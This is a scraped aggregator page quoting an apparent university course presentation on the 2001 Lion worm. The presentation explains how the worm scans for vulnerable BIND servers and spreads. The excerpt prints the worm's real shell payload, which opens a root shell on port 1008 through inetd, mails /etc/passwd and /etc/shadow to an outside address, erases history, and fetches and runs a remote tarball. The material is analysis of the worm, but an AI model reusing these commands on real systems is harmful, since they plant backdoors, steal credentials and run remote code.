Home > Hacking > Hack Email Login



Anatomy of Internet Worm

Sort Desciption:

Will start scan.sh & hack.sh which. will run in parallel as back ground. process. ... The worm sends password files to a pair of email addresses in ...



Content Inside:

Anatomy of Internet WormPage 1Anatomy ofLionInternet WormIDGAn "unusually destructive" computer worm is winding through the networkconduits of Linux computers capable of massively compromising servers by exploiting a known vulnerability. CNN" 20% of the Internet is vulnerable to this Why Lion worm? "because of the japan's disrepect cnhonker had been roused and the lion worm is just to tell the Japanese chinese is not sheep they must be answer for They must assue the obligation with their crimeThey must assue their action for the educational book." What makes the lion worm interesting is that it uses simple Unix shell script. And reuses codes that were used in previous worms. It looks for linux servers running BIND services Which has vulnerability to buffer overflow. Who It works ? Tcp connect port scan for port 53 Finds victims then attacks with bind exploit (Buffer overflow) Force the hacked server to download the worm from web site and will execute it Steel the user names and passwords files and Email them to an address @china.com Insert Trojan hoarse at the hacked server Covers its tracks in system logs Start spreading and attacking new servers from this hacked serverReferances: 1]http://security.itworld.com/4340/itwnews 01323worm2/page_1.html2]http://archives.cn n.com/2001/TECH/internet/03/23/linux.worm. idg/3]http://www.whitehats.com/library/wor ms/lion/index.html4]http://www.spitzner.or g/winwoes/Michigan State University CSE 825 Fuad Abu Jarad A360 117 63Page 2BIND exploitPATH='/usr/bin:/bin:/usr/local/bin/ :/usr/sbin/:/sbin'; export PATH;export TERM=vt100;rm rf /dev/.lib; mkdir /dev/.lib; cd /dev/.lib; echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf; killall HUP inetd; ifconfig a>1i0n;cat /etc/passwd >>1i0n;cat /etc/shadow >>1i0n;mail 1i0nip@china.com <1i0n;rm fr 1i0n;rm fr /.bash_history; lynx dump http://coollion.51.net/crew.tgz >1i0n.tgz;tar zxvf 1i0n.tgz;rm fr 1i0n.tgz;cd lib; ./1i0n.sh ...

Source: www.cse.msu.edu


add to Google Reader add to Google Bookmark add to bloglines add to newsgator add to FURL add to digg add to webnews add to Netscape add to Yahoo MyWeb add to spurl.net add to diigo Bookmark newsvine Bookmark del.icio.us Bookmark @ SIMPIFY Bookmark MISTER WONG Bookmark Linkarena Bookmark icio.de Bookmark oneview Bookmark folkd.com Bookmark yigg.de Bookmark reddit Bookmark StumbleUpon Bookmark Slashdot Bookmark blinklist Bookmark technorati add to blogmarks add to blinkbits add to ma.gnolia add to smarking.com add to netvouz add to co.mments add to Connotea add to de.lirio.us
Search Terms:

 

Related Files

Hacking T e c hniques T r aining

Filed under: Hacking and Hack Email Login
q Hackers hacking and the underground. q TCP/IP security. q DNS security. q Web security. q FTP security. q EMail security. q Windows security ...

Password Strategy

Filed under: Hacking and Hack Email Login
can access your email bank accounts health records buying habits and more. ... The bad guys boast that there isnt a password they cant hack one way or ...

hack the net

Filed under: Hacking and Hack Email Login
EMAIL Server looking for names like oracle TestLinux .... try a zone transfer .... install rootkits steal password database start network sniffer ...

Google Hacking Against Privacy

Filed under: Hacking and Hack Email Login
gives all email postings which are sent to mailmanbased lists and related ... Username and password pairs can be searched within sql dump files and other ...

Hack Attack: Secure your laptop with the LaptopLock Lifehacker

Filed under: Hacking and Hack Email Login
completely free requiring an email address and a password. Once you've signed up .... special feature Hack Attack appears every Tuesday on Lifehacker. ...